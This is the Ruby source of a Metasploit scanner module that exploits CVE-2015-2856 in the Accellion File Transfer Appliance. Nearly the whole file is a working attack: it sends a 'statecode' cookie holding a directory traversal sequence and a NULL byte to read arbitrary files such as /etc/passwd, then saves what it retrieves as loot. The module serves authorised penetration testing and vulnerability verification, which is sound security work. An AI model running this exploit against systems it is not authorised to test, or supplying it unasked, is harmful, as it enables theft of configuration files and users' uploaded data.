Accellion FTA 'statecode' Cookie Arbitrary File Read

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner

  def initialize(info = {})
    super(update_info(info,
      'Name'           => "Accellion FTA 'statecode' Cookie Arbitrary File Read",
      'Description'    => %q{
          This module exploits a file disclosure vulnerability in the Accellion
        File Transfer appliance. This vulnerability is triggered when a user-provided
        'statecode' cookie parameter is appended to a file path that is processed as
        a HTML template. By prepending this cookie with directory traversal sequence
        and appending a NULL byte, any file readable by the web user can be exposed.
        The web user has read access to a number of sensitive files, including the
        system configuration and files uploaded to the appliance by users.
        This issue was confirmed on version FTA_9_11_200, but may apply to previous
        versions as well. This issue was fixed in software update FTA_9_11_210.
      },
      'Author'         => [ 'hdm' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['URL', 'https://www.rapid7.com/blog/post/2015/07/10/r7-2015-08-accellion-file-transfer-appliance-vulnerabilities-cve-2015-2856-cve-2015-2857/'],
          ['CVE', '2015-2856']
        ],
      'DisclosureDate' => '2015-07-10'
    ))

    register_options(
      [
        Opt::RPORT(443),
        OptBool.new('SSL', [true, 'Use SSL', true]),
        OptString.new('TARGETURI', [true, 'The URI to request that triggers a call to template()', '/courier/intermediate_login.html']),
        OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),
      ])
  end

  def run_host(ip)
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => datastore['TARGETURI'],
      'cookie' => 'statecode=../../../../..' + datastore['FILEPATH'] + '%00',
    })

    return if not res

    if res.code != 200
      vprint_status("#{peer} Unexpected response code: #{res.code} #{res.message}")
      return
    end

    contents = res.body.to_s

    # Check for patched versions of the FTA
    if contents =~ / Missing session ID.*Accellion, Inc/m
      print_error("#{peer} Appears to be a patched Accellion FTA")
      return
    end

    fname = ::File.basename(datastore['FILEPATH'])

    expected_server  = "Apache"
    expected_expires = 'Mon, 26 Jul 1997 05:00:00 GMT'

    # Use hints from the server headers to indicate whether we think this was a valid response
    if res.headers['Server'].to_s == expected_server && res.headers['Expires'].to_s == expected_expires
      path = store_loot(
        'accellion.fta.file',
        'application/octet-stream',
        rhost,
        res.body,
        fname
      )
      print_good("#{peer} Successfully downloaded #{datastore['FILEPATH']} as #{path}")
    else
      vprint_status(
        "#{peer} Unexpected response headers: (Server=#{res.headers['Server'].inspect} Expected=#{expected_server.inspect}) " +
        "(Expires=#{res.headers['Expires'].inspect} Expected=#{expected_expires.inspect})"
      )
    end
  end
end